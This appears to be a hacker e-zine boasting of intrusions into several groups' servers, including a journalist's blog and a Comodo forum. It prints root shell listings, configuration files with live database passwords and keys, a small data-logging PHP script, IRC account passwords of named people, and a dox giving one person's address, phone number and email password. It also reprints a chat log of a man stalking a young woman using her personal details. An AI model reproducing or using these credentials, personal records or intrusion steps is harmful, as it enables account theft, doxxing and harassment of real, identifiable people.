-Spyd3r -> Riot: I have a lot of respect for a few g00ns in particular
-Spyd3r -> Riot: I won't state them here, but I'll admit you've made the list
-Riot -> Spyd3r: Thanks, I appreciate it.
-Riot -> Spyd3r: #TEXTCEE
-Spyd3r -> Riot: and of those members, I have called (a few of) their parents
-and attempted to verify that info
-Spyd3r -> Riot: tbh, pr0be's mom was hilarious
-Riot -> Spyd3r: I love probe too
-Spyd3r -> Riot: I ENVY him!
-Spyd3r -> Riot: I envy you too
-Riot -> Spyd3r: Why is that?
-Spyd3r -> Riot: I'm in my late 20's
-Riot -> Spyd3r: So.
-Spyd3r -> Riot: yer both young and brite
-CryptiK -> #illmob: well anonymous is gay. they can dos me all they want.
-Phist -> Genocide: Deadly Data
-Phist -> Genocide: Chris Richardson
-Phist -> Genocide: Apartment
-Phist -> Genocide: 2627 N Bourbon St. #27
-Phist -> Genocide: Orange, CA 92865
-Phist -> Genocide: (714) 322-0741
-Phist -> Genocide: Email: Deadlydata
-Phist -> Genocide: Password: partyguy6924
-Phist -> Genocide: IP:
-Genocide -> Phist: lawlz
-Phist -> Genocide: That's wrong
-tribaL -> loSt: as soon as illmob moves off our box
-loSt -> tribaL: yo
-tribaL -> loSt: im going to fucking ddos them to shit
-tribaL -> loSt: i've done EVERYTHINGinmy power t help them
-tribaL -> loSt: while illwill was locked up
-tribaL -> loSt: and i get disrespected by him saying he has evverybodys dox
-tribaL -> loSt: and he doubts i can get his
-tribaL -> loSt: i fucking hosted their irc
-loSt -> tribaL: why does illwill think he is the shit?
-tribaL -> loSt: anybody thats ever fucked with them I TOOK DOWN
-tribaL -> loSt: its not him
-loSt -> tribaL: he came back after 2 years thinking he still knows everything
-Some simple logs for you.
-[root@demon2 illmob]# ls -al
-total 92
-drwx--x--x 7 illmob illmob 4096 Apr 1 04:21 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
-drwx------ 2 illmob illmob 4096 Aug 2 2007 backups
--rw-r--r-- 1 illmob illmob 24 Aug 1 2007 .bash_logout
--rw-r--r-- 1 illmob illmob 176 Aug 1 2007 .bash_profile
--rw-r--r-- 1 illmob illmob 124 Aug 1 2007 .bashrc
--rw-r--r-- 1 illmob illmob 3541 Feb 1 11:44 blade.css
-drwxr-xr-x 3 illmob illmob 4096 Aug 2 2007 domains
-drwxrwx--- 3 illmob illmob 4096 Mar 12 16:37 imap
-drwx------ 2 illmob illmob 4096 Aug 1 2007 mail
--rw-r--r-- 1 illmob illmob 21544 Feb 1 11:44 network.html
--rw-r--r-- 1 illmob illmob 12391 Feb 1 11:44 network.xml
-lrwxrwxrwx 1 illmob illmob 32 Apr 1 04:21 public_html -> ./domains/
--rw-r----- 1 illmob mail 34 Apr 1 04:21 .shadow
-drwxr-xr-x 3 illmob illmob 4096 Jan 7 20:20 webmail
-[root@demon2 illmob]# ls -al public_html/
-total 39396
-drwxr-xr-x 28 illmob illmob 4096 Mar 19 12:37 .
-drwxr-xr-x 8 illmob illmob 4096 Aug 2 2007 ..
--rw-r--r-- 1 illmob illmob 970 Jan 31 2006 404.shtml
--rw-r--r-- 1 illmob illmob 90738 Jan 31 2006 404.swf
--rw-r--r-- 1 illmob illmob 148330 Jan 2 20:59 60592_owned.jpg
--rw-r--r-- 1 illmob illmob 7168 Jan 10 09:25 aim.exe
--rw-r--r-- 1 illmob illmob 279054 Jan 10 22:37 aimview.jpg
--rw-r--r-- 1 illmob illmob 603176 Feb 21 18:55 autoruns.exe
--rw-r--r-- 1 illmob illmob 5672 Feb 24 2006 BatShells.rar
--rw-r--r-- 1 illmob illmob 9150 Feb 24 2006 batshells.txt
--rw-r--r-- 1 illmob illmob 100 Mar 2 09:44 bb.html
--rw-r--r-- 1 illmob illmob 177664 Feb 3 2006 BinaryTextScan.exe
--rw-r--r-- 1 illmob illmob 3541 Feb 1 11:46 blade.css
--rw-r--r-- 1 illmob illmob 700 Jan 31 2006 blah_left.htm
--rw-r--r-- 1 illmob illmob 55233 Jan 31 2006 blah_right.htm
--rw-r--r-- 1 illmob illmob 86132 Feb 20 2006 blingring.jpg
-drwxr-xr-x 2 illmob illmob 4096 Feb 11 07:05 carputer
--rw-r--r-- 1 illmob illmob 13962 Feb 12 2006 case.html
-drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 cd-nix
--rw-r--r-- 1 illmob illmob 81 Feb 15 20:58 celebs.html
--rw-r--r-- 1 illmob illmob 345466 Feb 15 20:56 celebs.rar
--rw-r--r-- 1 illmob illmob 345244 Feb 15 21:00
-drwxr-xr-x 2 illmob illmob 4096 Jan 28 2006 cgi-bin
-drwxr-xr-x 4 illmob illmob 4096 Aug 1 2007 chat
-drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 clay
--rw-r--r-- 1 illmob illmob 13450 Jan 31 2006 Copy of index.php
--rw-r--r-- 1 illmob illmob 22565 Jan 14 21:24 Desktop.rar
-drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 desktops
--rw-r--r-- 1 illmob illmob 784605 Oct 30 2006 ds2.mp3
--rw-r--r-- 1 illmob illmob 3139377 Oct 30 2006 ds.mp3
-drwxrwxr-x 2 illmob illmob 4096 Aug 4 2007 ff
-drwxrwxr-x 16 illmob illmob 4096 Aug 1 2007 files
--rw-r--r-- 1 illmob illmob 115057 Mar 18 2006 files.html
-drwxr-xr-x 6 illmob illmob 4096 Aug 1 2007 fingerbang
--rw-r--r-- 1 illmob illmob 5310 Dec 19 07:38 firefox.txt
-drwxr-xr-x 6 illmob illmob 4096 Aug 1 2007 freeillwill
--rw-r--r-- 1 illmob illmob 28119 Mar 17 18:54 fuckme.JPG
-drwxr-xr-x 3 illmob illmob 36864 Aug 12 2007 funny
--rw-r--r-- 1 illmob illmob 6301 Jan 5 22:00 getkey.exe
--rw-r--r-- 1 illmob illmob 65649 Jan 9 21:37 getkeyvista.JPG
--rw-r--r-- 1 illmob illmob 43518 Jan 15 18:12 google.jpg
--rw-r--r-- 1 illmob illmob 9652 Jan 31 2006 hack.jpg
--rw-r--r-- 1 illmob illmob 3197 Mar 13 20:16 h.gif
--rw-r--r-- 1 illmob illmob 69822 Feb 2 2006 hozilla.bmp
--rw-r--r-- 1 illmob illmob 100571 Feb 3 2006 hozilla.htm
--rw-r--r-- 1 illmob illmob 87474 Dec 21 13:22
--rw-r--r-- 1 illmob illmob 0 Feb 5 2006 .htaccess
--rw-r--r-- 1 illmob illmob 16761 Feb 20 2006 illmob_logo.jpg
--rw-r--r-- 1 illmob illmob 1134 Feb 1 2006 illmob_radio.pls
--rw-r--r-- 1 illmob illmob 199955 Jan 31 2006 illwill.html
-drwxrwxr-x 8 illmob illmob 4096 Jan 16 06:30 images
--rw-r--r-- 1 illmob illmob 95409 Mar 6 2006 img_0029.jpg
-drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 inc
--rwxr-xr-x 1 illmob illmob 608 Apr 28 2006 index.old
--rw-r--r-- 1 illmob illmob 8718 Feb 15 2006 index_.php
--rw-r--r-- 1 illmob illmob 8712 Feb 14 2006 index.php
-drwxr-xr-x 3 illmob illmob 4096 Mar 12 16:34 irc
--rw-r--r-- 1 illmob illmob 14838 Feb 23 2006 jen2.jpg
--rw-r--r-- 1 illmob illmob 15052 Feb 23 2006 jen3.jpg
--rw-r--r-- 1 illmob illmob 14896 Feb 23 2006 jen.jpg
-drwxr-xr-x 4 illmob illmob 4096 Mar 13 21:19 kiddies
-drwxr-xr-x 2 illmob illmob 4096 Feb 1 11:58 lanimages
--rw-r--r-- 1 illmob illmob 331 Jan 31 2006 links.html
--rw-r--r-- 1 illmob illmob 775930 Mar 2 2006 ll.jpg
--rw-rw-r-- 1 illmob illmob 0 Feb 2 2006 logger.html
--rw-r--r-- 1 illmob illmob 219 Feb 2 2006 logger.php
--rwxr-xr-x 1 illmob illmob 18554 Jun 5 2003 logo.jpg
-drwxr-xr-x 3 illmob illmob 4096 Aug 1 2007 macdaddy
--rw-r--r-- 1 illmob illmob 2326 Mar 10 2006 macdaddy.html
-drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 mactrack
-drwxr-xr-x 2 illmob illmob 4096 Dec 21 12:56 maxima
--rw-r--r-- 1 illmob illmob 17518 Dec 21 13:24 me.jpg
--rw-r--r-- 1 illmob illmob 447 Feb 13 2006 mia.txt
--rw-r--r-- 1 illmob illmob 1475 Feb 23 2006 minishell.asm
--rw-r--r-- 1 illmob illmob 2560 Feb 23 2006 minishell.exe
--rw-r--r-- 1 illmob illmob 1218 Mar 10 2006 motd
--rw-r--r-- 1 illmob illmob 19119 Feb 28 2006 mouth.jpg
-drwxr-xr-x 2 illmob illmob 4096 Feb 20 15:42 myQuickAdmin
--rw-r--r-- 1 illmob illmob 6780 Jan 31 14:38 myspace.html
--rw-r--r-- 1 illmob illmob 21548 Feb 1 12:00 network.html
--rw-r--r-- 1 illmob illmob 12391 Feb 1 11:46 network.xml
-drwxr-xr-x 2 illmob illmob 4096 Jan 10 12:56 new
--rw-r--r-- 1 illmob illmob 903 Jan 31 2006 new.gif
--rw-r--r-- 1 illmob illmob 11903 Jan 31 2006 oldindex.php
--rw-r--r-- 1 illmob illmob 53497 Feb 20 2006 panel.php
--rw-r--r-- 1 illmob illmob 18438 Jan 10 22:40 passview.jpg
--rw-r--r-- 1 illmob illmob 22301 Jan 11 06:33 passview.png
--rw-r--r-- 1 illmob illmob 52930 Jan 31 2006 paypal3.jpg
--rw-r--r-- 1 illmob illmob 35474 Jan 31 2006 paypal4.jpg
--rw-r--r-- 1 illmob illmob 52541 Jan 31 2006 paypal-malcovitch1.jpg
--rw-r--r-- 1 illmob illmob 55151 Jan 31 2006 paypal-malcovitch2.jpg
--rw-r--r-- 1 illmob illmob 54589 Jan 31 2006 paypal-malcovitch3.jpg
--rw-r--r-- 1 illmob illmob 58468 Jan 31 2006 paypal-malcovitch4.jpg
-drwxr-xr-x 2 illmob illmob 4096 Feb 18 15:30 phist
--rw-r--r-- 1 illmob illmob 1922 Dec 4 11:14 php.txt
--rw-r--r-- 1 illmob illmob 20867 Mar 2 2006 pigroast.jpg
--rw-r--r-- 1 illmob illmob 3564584 Feb 21 18:55 procexp.exe
--rw-r--r-- 1 illmob illmob 19987 Feb 24 2006 r00t1n.txt
--rw-r--r-- 1 illmob illmob 3772 Mar 31 2006 rainbow.html
--rw-r--r-- 1 illmob illmob 40754 Mar 18 2006 releases.html
--rw-r--r-- 1 illmob illmob 4604 Feb 24 2006 reverse.bat
--rw-r--r-- 1 illmob illmob 850 Jan 31 2006 rid.php
--rw-r--r-- 1 illmob illmob 55412 Jul 3 2007 rulezz.conf
--rw-r--r-- 1 illmob illmob 3054 Feb 23 2006 shell.bat
--rw-r--r-- 1 illmob illmob 9722720 Feb 21 18:54 spybot.exe
--rw-r--r-- 1 illmob illmob 18569 Jun 7 2007 staff.html
--rw-r--r-- 1 illmob illmob 17038 Oct 9 2006 staff.old
--rw-r--r-- 1 illmob illmob 3136 Mar 19 12:37 stalker.txt
--rw-r--r-- 1 illmob illmob 1224537 Dec 27 09:21 StupidKidGangsta.gif
-drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007
--rw-r--r-- 1 illmob illmob 2560 Jan 31 2006 test.exe
--rw-r--r-- 1 illmob illmob 15169130 Mar 12 2006 TheILLIST.rar
--rw-r--r-- 1 illmob illmob 940 Nov 1 2006 tikiwiki.txt
--rw-r--r-- 1 illmob illmob 186040 Feb 15 2006 tommy.jpg
--rw-r--r-- 1 illmob illmob 10181 Jan 16 06:39 toughbook.html
--rw-r--r-- 1 illmob illmob 1073835 Dec 26 06:21
--rw-r--r-- 1 illmob illmob 2545 Mar 7 2006 users.txt
-drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 videos
--rw-r--r-- 1 illmob illmob 170305 Feb 21 18:27 vnc.exe
--rw-r--r-- 1 illmob illmob 115200 Feb 22 18:09 vundofix.exe
-drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 wan
--rw-r--r-- 1 illmob illmob 29639 Feb 20 2006 woodohs.jpg
-drwxr-xr-x 2 illmob illmob 4096 Aug 1 2007 wtf
-[root@demon2 public_html]# cat stalker.txt
-[15:53] hackerillwill: hi
-[15:53] SAMCAT03: hi
-[15:53] hackerillwill: im still trying to figure you out lol
-[15:54] SAMCAT03: ok
-[15:54] hackerillwill: u said wallingfor drighht
-[15:54] SAMCAT03: dont worry about it
-[15:57] SAMCAT03: well u obviously dont know who i am so why bother
-[15:57] SAMCAT03: its not important
-[15:58] hackerillwill:
-Age: 22, Gender: female, Location: Waterbury, CT
-[15:58] SAMCAT03: ok
-[15:58] hackerillwill:
-Samantha Moeckel
-[15:58] SAMCAT03: and thats wrong
-[15:58] hackerillwill: BETTER?
-[15:59] SAMCAT03: thats not me
-[15:59] hackerillwill: capricorn
-[15:59] hackerillwill: attend Western Connecticut State University majoring in
-secondary math education
-[15:59] SAMCAT03: nope
-[16:00] hackerillwill: sgm1385 is your yahoo
-[16:01] SAMCAT03: why do u care who i am?
-[16:01] hackerillwill: like i said i was just wondering because i added you
-like 2 yrs ago
-[16:01] hackerillwill: and you make me have to do it the hard way
-[16:01] SAMCAT03: ummm ok
-[16:01] hackerillwill: maybe we flirted in a chatroom before
-[16:02] SAMCAT03: u still dont know me though
-[16:02] SAMCAT03: no cause i dont go on yahoo
-[16:02] hackerillwill: i never said i talke dto you on yahoo
-[16:03] hackerillwill: im just saying thats your yahoo name
-[16:03] SAMCAT03: im sorry im just having a tough time right now i dont mean to
-be rude
-[16:03] hackerillwill: its ok
-[16:04] hackerillwill: yer cute i guess
-[16:04] SAMCAT03: how do u even have a [pic of me?
-[16:05] hackerillwill: i have a bunch of pics of you
-[16:05] SAMCAT03: ok but how?
-[16:05] hackerillwill: i like the one of you in the black dress in the hcair
-[16:05] hackerillwill: chair*
-[16:05] hackerillwill: ok seperate my screen name
-[16:05] hackerillwill: im illwill
-[16:06] hackerillwill: whats the first part
-[16:06] SAMCAT03: u still arent answering the question
-[16:06] hackerillwill: i just did
-[16:06] hackerillwill: come on youre a college gril
-[16:06] hackerillwill: girl*
-[16:07] hackerillwill: MOECKEL, SAMANTHA G (Age 23)
-[16:07] hackerillwill: daughter of MOECKEL, SANDRA A (Age 59)
-[16:07] hackerillwill: better?
-[16:08] SAMCAT03: i dont got time to be playing games
-[16:08] SAMCAT03: bye
-[16:08] hackerillwill: did you seperate my screen name
-[16:08] hackerillwill: hackerillwill
-[16:08] hackerillwill: illwill
-[16:08] hackerillwill: hacker
-[16:09] SAMCAT03: yes but im not playing bye
-[16:09] SAMCAT03: i have better things to do then be stalked
-[16:09] hackerillwill: im not stalking
-[16:09] hackerillwill: i simply asked who you were
-[16:09] hackerillwill: thats all i wanted to know
-[16:10] hackerillwill: you could have said hi im sam im from waterbury
-[16:10] SAMCAT03: ok so then u know so bue
-[16:10] SAMCAT03: bye
-[16:10] hackerillwill: wtf
-[16:10] hackerillwill: i been to youre house
-[16:10] hackerillwill: your*(
-[16:10] hackerillwill: on madera
-[16:11] hackerillwill: or was it oakland
-[16:11] hackerillwill: we went to wilby together
-[16:12] SAMCAT03: ok
-[16:14] hackerillwill: u still got the same number?
-[root@demon2 public_html]# cat freeillwill/shoutbox/config.php
-$admin = 'illwill';
-$admin_pass = sha1('sh0utp455');
-$timezone = -5;
-$show_shouts = 10;
-$flood_control = 20;
-[root@demon2 public_html]# cat logger.php
-$info = $_GET['upp'];
-$datatime = date('g:i a m/d/y');
-$ipaddr = $_SERVER['REMOTE_ADDR'];
-$info = str_replace("|", "<br>",$info);
-$thelog = fopen($ipaddr, "a");
-fputs($thelog, "$info");
-170,000 lines of spam in illwill's spools. Here is his shortlist of friends:
-[root@demon2 illmob]# grep -A 5 'New user' mail/ | grep -v ^$
-New user registration on your blog [ill]mob:
-Username: Spyd3r
-New user registration on your blog [ill]mob:
-Username: padlock
-New user registration on your blog [ill]mob:
-Username: SomeGuy
-New user registration on your blog [ill]mob:
-Username: illwill
-New user registration on your blog [ill]mob:
-Username: Phist
-New user registration on your blog [ill]mob:
-Username: Lone
-New user registration on your blog [ill]mob:
-Username: pingywon
-New user registration on your blog [ill]mob:
-Username: morning_wood
-Let's finish it off with some passes
-[ill]will -> nickserv: identify ircp455
-Spyd3r -> nickserv: IDENTIFY m0b1llSpyd3r
-Phist -> nickserv: identify O1945y87v
-coldblood -> identify coldblood867
-canr -> nickserv: identify password132
-gh0st -> IDENTIFY milliardo
-padlock -> nickserv: identify 01n00bsie79
-ECB -> nickserv: identify 5919625
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Safety on the Internet zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-To reduce our targets, we are enlisting your help to solve a problem for us. We
-want you, the people of the internet, to take positive steps to reduce total
-contemptability. We offer some comments and suggestions in no particular order:
-1. Don't be a dick. Alternatively, you could try getting off IRC, closing your
-shitty website, and getting off the internet.
-Go watch some TV or something.
-2. Don't try to scam money out of the internet.
-3. Don't talk to Phate.
-Phate (ZF0wned in ZF02) sent us an IRC log of some guys dissing us. We're not
-sure if the point was to let us know that random noobs dislike us, or to get
-these people owned. All it meant to us was whether or not we should own and
-publish them. We didn't bite.
-<sirukin> I better shut up before I'm owned.
-That may have been said in full sarcasm, but do you really want to take the
-Did any of you guys realise that Phate was actually going to email us that log?
-Seriously, stay away from that treacherous owntard.
-4. Do not pass Go.
-5. Keep it real. Stick to what you know.
-For an obvious example, Steven J. Murdoch (PhD student) of Light Blue
-Touchpaper wrote a blog entry about how Google is an expert hash-cracking
-machine. Someone with any real-world experience could have Googled right away,
-or searched for the hash in one of many sites that store them, and found it
-that way. Or used jtr, which would crack the password much faster than his
-custom Python tool. Not to mention using a real wordlist - if whatever wordlist
-collection you use doesn't have "Anthony" in it, then it is pretty worthless.
-Starting by writing a slow program to crack MD5s against a wordlist, and after
-futily failing in that regard going to the internet, shows that LBT has less
-practical experience than the most inexperienced of script kiddies (which makes
-sense, considering one apparently owned them). Yet instead of the stupid blog
-revealing this to much laughter and humilitation, the internet seemed to like
-the post and link it everywhere. Even Bruce Schneier was fazed by it. Way to
-spread ignorance around because of the respect garnered by your academic
-standing. Neither LBT nor Schneier were targets, it's just one simple example
-for you.
-<--- reality --------------------------------------- academia --->
-6. Nobody cares about your blog, it exists only to occupy your time and satisfy
-your feelings of influence on the world. The more flattering attention you
-seek, the more negative attention you will get with it. You should probably
-pack it up before someone owns your Wordpress and you have to make a post about
-how you got pwned and try to pass it off as meaningless, plus display your weak
-forensic techniques.
-7. There's always someone better than you, so a little modesty is a good thing.
-We aren't exactly great examples here, but nobody's perfect (yet). We're
-working on the perfection thing, give us time. It's Operation Supermen, and in
-case you were dreaming, there's nothing homosexual about it, faggot. :P
-Somehow Thomas Ptacek found himself as the king of the security blog scene, and
-eventually took this a bit far by blogging a paragraph on every fresh security
-topic as if he was an ultimate authority. He wasn't exactly arrogant or unfair,
-but gobbles took offense and smacked him down. Ptacek backed off and threw his
-energy into Wikipedia, where he has made thousands of edits now. He's even done
-some good work, successfully campaigning for the deletion of a lot of bullshit
-"hacker" biographies like those on our Whitedust founders! He basically took
-his authoritative position to Wikipedia, which is ok for now because Wikipedia
-lacks anybody else talented to do that work. Currently it's just Myles Long of
-CDC using his Wikipedia administrator authority to write a lot of complementary
-articles on CDC members, so Ptacek is a welcome relief. (Ptacek and Matasano
-were not targets, just examples.)
-8. Similarly to #3, do not email us with taunts or insults.
-Maybe it's cool if you detail your fair opinions to friends, but if you just
-ask us to own you, you might just get owned! Also if you run a website and you
-do not want to be humiliated, do not let members diss us or others. Kids like
-tripple generally are not worth owning, but Blackcode might be. Dig it?
-We likes jokes though. Jokes > taunts. We have a good one about three g00ns
-walking into a bar. :P
-9. Do not have dynamic content on your website. You're probably not smart
-enough and committed enough to secure it. Most likely nobody gives a shit about
-it anyways.
-10. Bugs Bunny is fucking timeless.
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Robert Lemos zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-Well after Bambenek in the last issue im sure you will be delighted to know we decided
-we needed to own another whitehat blogger. This time it is Mr Bobby "Bologna" Lemos!
-Otherwise known as securityfocus' Robert Lemos!
-Anyway, we mainly target these guys to publish the zine on their blog,
-but here's a mini hax log anyway!
-$ ls -la /home/robertle/
-total 272
-drwxr-sr-x 8 robertle robertle 4096 Apr 25 13:56 .
-drwx--s--x 4 robertle robertle 4096 Mar 26 2007 ..
-drwxr-sr-x 2 robertle robertle 4096 Apr 16 2007 cgi-bin
--rw-r--r-- 1 robertle robertle 169 May 24 2007 .htaccess
-drwxr-sr-x 3 robertle robertle 4096 Apr 16 2007 images
--rw-r--r-- 1 robertle robertle 94 Apr 25 13:34 index.php
--rw-r--r-- 1 robertle robertle 15127 Apr 25 13:34 license.txt
-drwxr-sr-x 2 robertle robertle 4096 Apr 16 2007 public
--rw-r--r-- 1 robertle robertle 7638 Apr 25 13:34 readme.html
-drwxr-sr-x 7 robertle robertle 4096 Apr 25 13:36 wp-admin
--rw-r--r-- 1 robertle robertle 32776 Apr 25 13:36 wp-app.php
--rw-r--r-- 1 robertle robertle 129 Apr 25 13:36 wp-atom.php
--rw-r--r-- 1 robertle robertle 1026 Apr 25 13:36 wp-blog-header.php
--rw-r--r-- 1 robertle robertle 2919 Apr 25 13:36 wp-comments-post.php
--rw-r--r-- 1 robertle robertle 153 Apr 25 13:36 wp-commentsrss2.php
--rw-r--r-- 1 robertle robertle 1308 Apr 25 13:36 wp-config.php
-drwxr-sr-x 4 robertle robertle 4096 Apr 25 13:36 wp-content
--rw-r--r-- 1 robertle robertle 851 Apr 25 13:37 wp-cron.php
--rw-r--r-- 1 robertle robertle 120 Apr 25 13:37 wp-feed.php
-drwxr-sr-x 4 robertle robertle 4096 Apr 25 13:39 wp-includes
--rw-r--r-- 1 robertle robertle 1529 Apr 25 13:39 wp-links-opml.php
--rw-r--r-- 1 robertle robertle 16439 Apr 25 13:39 wp-login.php
--rw-r--r-- 1 robertle robertle 6077 Apr 25 13:39 wp-mail.php
--rw-r--r-- 1 robertle robertle 296 Apr 25 13:39 wp-pass.php
--rw-r--r-- 1 robertle robertle 190 Apr 25 13:39 wp-rdf.php
--rw-r--r-- 1 robertle robertle 251 Apr 25 13:39 wp-register.php
--rw-r--r-- 1 robertle robertle 129 Apr 25 13:39 wp-rss2.php
--rw-r--r-- 1 robertle robertle 127 Apr 25 13:39 wp-rss.php
--rw-r--r-- 1 robertle robertle 14493 Apr 25 13:39 wp-settings.php
--rw-r--r-- 1 robertle robertle 3123 Apr 25 13:39 wp-trackback.php
--rw-r--r-- 1 robertle robertle 68155 Apr 25 13:39 xmlrpc.php
-# Plain old WP!
-$ cat /home/robertle/
-// ** MySQL settings ** //
-define('DB_NAME', 'robertle_wordpress'); // The name of the database
-define('DB_USER', 'robertle_wordpre'); // Your MySQL username
-define('DB_PASSWORD', 'hy78DRh2'); // ...and password
-define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
-define('DB_CHARSET', 'utf8');
-define('DB_COLLATE', '');
-// Change SECRET_KEY to a unique phrase. You won't have to remember it later,
-// so make it long and complicated. You can visit
-// to get a secret key generated for you, or just make something up.
- '+pR=X+zOk&#&97_U0U\\[!I+F&f,ST^`faRC@2w)roiH) LNPUH 0CRXm]Wgl:~Js');
- // Change this to a unique phrase.
-// You can have multiple installations in one database if you give each a unique prefix
-$table_prefix = 'wp_'; // Only numbers, letters, and underscores please!
-// Change this to localize WordPress. A corresponding MO file for the
-// chosen language must be installed to wp-content/languages.
-// For example, install to wp-content/languages and set WPLANG to 'de'
-// to enable German language support.
-define ('WPLANG', '');
-/* That's all, stop editing! Happy blogging. */
-define('ABSPATH', dirname(__FILE__).'/');
-$ cat lemos-DB-users.txt.trim
-Wow, even n3td3v has an account there! Sweet, we've hit the big time.
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Every Zine Needs a Song zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-Superhacker Paul McCartney volunteered this tribute song. I actually thought it was
-kinda crappy, but with all the effort going into it (he said he went back in time and
-wrote it for us) we just couldn't turn him down. But when he started rambling on about
-time warp I hung up the phone.
-Don't Pass Me By
- - A Tribute to a FED
-I listen for your footsteps
-Coming up the drive
-Listen for your footsteps
-But they don't arrive
-Waiting for your knock dear
-On my old front door
-I don't hear it
-Does it mean you don't love me any more.
-I hear the clock a'ticking
-On the mantel shelf
-See the hands a'moving
-But I'm by myself
-I wonder where you are tonight
-And why I'm by myself
-I don't see you
-Does it mean you don't love me any more.
-Don't pass me by don't make me cry don't make me blue
-'Cause you know darling I love only you
-You'll never know it hurt me so
-How I hate to see you go
-Don't pass me by don't make me cry
-I'm sorry that I doubted you
-I was so unfair
-You were in a car crash
-And you lost your hair
-You said that you would be late
-About an hour or two
-I said that's alright I'm waiting here
-Just waiting to hear from you.
-Paul's a hoot. A real nut.
-Opinions expressed here by Paul McCartney are not representative of the views
-of Zero For 0wned or any of its members. Feds can stay the fuck away.
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Comodo zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-Comodo is founded by "security architects" who have been in the business of
-running ./nessus for years. Today they still run ./nessus for fun and profit
- but they also offer their "security solutions" world wide to over 200,000
- customers in more than 100 countries, securing 500,000+ businesses and
-individuals! Comodo - Creating Trust Online (TM).
-They deploy ./security-solutions for a nominal fee so *you* can rest assured
-that nobody will ./h4x0r your network. They can sell you flashy banners for
-your site which say "COMODO HACKER PROOF; TESTED $date" and "Identity assured
-up to $1 mil" Comodo is kind enough to let us download their "products" for
- free. Even though my windows VMware crashed when I ran both "Comodo
-Firewall Pro" and "Comodo Anti-Malware" I am assured those programs are 100%
-authentic and hacker-safe, tested $date, and the best solution against evil
- hackers. Take the no risk HackerProof challenge today!
-Once you have bought a SSL certificate from comodo and installed it on your
-website you are assured that your site is 100% hacker proof and nobody can
-./sniff it. Because Comodo offers the *best* solutions, they run their own
- products on their corporate website and forum. Since they're the BEST, no
-evil hacker can compromise their server otherwise they'd have to give refunds
- to over 200,000 customers in more than 100 countries, securing 500,000+
-businesses and individuals! And the flashy banners which said "HackerProof"
- are just flashy banners right?
-apache@tcfweb1 /var/www $ ls -al
-total 0
-drwxr-xr-x 8 apache root 240 Dec 3 14:21 .
-drwxr-xr-x 14 root root 360 Dec 21 2006 ..
-drwxr-xr-x 5 root root 184 Oct 22 22:12
-drwxr-xr-x 5 root root 120 Aug 22 2007
-drwxr-xr-x 6 apache apache 144 Dec 1 2006 localhost
-drwxr-xr-x 4 root root 96 Jan 29 15:34
-drwxr-xr-x 2 1023 users 80 Jun 9 2007 outage
-drwxr-xr-x 6 root root 184 Nov 20 21:36
-apache@tcfweb1 /var/www/ $ cat Settings.php
-# Garbage cutage
-########## Forum Info ##########
-$mbname = 'Welcome to the Comodo Forum'; # The name of your forum.
-$language = 'english-utf8'; # The default language file set for the forum.
-$boardurl = ''; # URL to your forum's folder.
- (without the trailing /!)
-$webmaster_email = ''; # Email address to send
- emails from. (like
-$cookiename = 'SMFCookie10'; # Name of the cookie to set for authentication.
-########## Database Info ##########
-$db_server = 'csql';
-$db_name = 'forum';
-$db_user = 'smf';
-$db_passwd = 'cosmicjam8'; # that's a fine secure and authentic password
-$db_prefix = 'smf_';
-$db_persist = 0;
-$db_error_send = 0;
-########## Directories/Files ##########
-# Note: These directories do not have to be changed unless you move things.
-$boarddir = '/var/www/'; # The absolute
-path to the forum's folder. (not just '.'!)
-$sourcedir = '/var/www/'; # Path
-to the Sources directory.
-########## Error-Catching ##########
-# Note: You shouldn't touch these settings.
-$db_last_error = 1181233707;
-# Make sure the paths are correct... at least try to fix them.
-if (!file_exists($boarddir) && file_exists(dirname(__FILE__) .
-$boarddir = dirname(__FILE__);
-if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources'))
-$sourcedir = $boarddir . '/Sources';
-apache@tcfweb1 /var/www/ $ cat LocalSettings.php
-# Garbage cutage
-## Uncomment this to disable output compression
-# $wgDisableOutputCompression = true;
-$wgSitename = "ComodoWiki";
-## The URL base path to the directory containing the wiki;
-## defaults for all runtime URL paths are based off of this.
-$wgScriptPath = "";
-$wgScriptExtension = ".php";
-# short urls
-$wgArticlePath = "/$1";
-$wgUsePathInfo = false;
-## For more information on customizing the URLs please see:
-$wgEnableEmail = true;
-$wgEnableUserEmail = true;
-$wgEmergencyContact = "";
-$wgPasswordSender = "";
-## For a detailed description of the following switches see
-## and
-## There are many more options for fine tuning available see
-## /includes/DefaultSettings.php
-## UPO means: this is also a user preference option
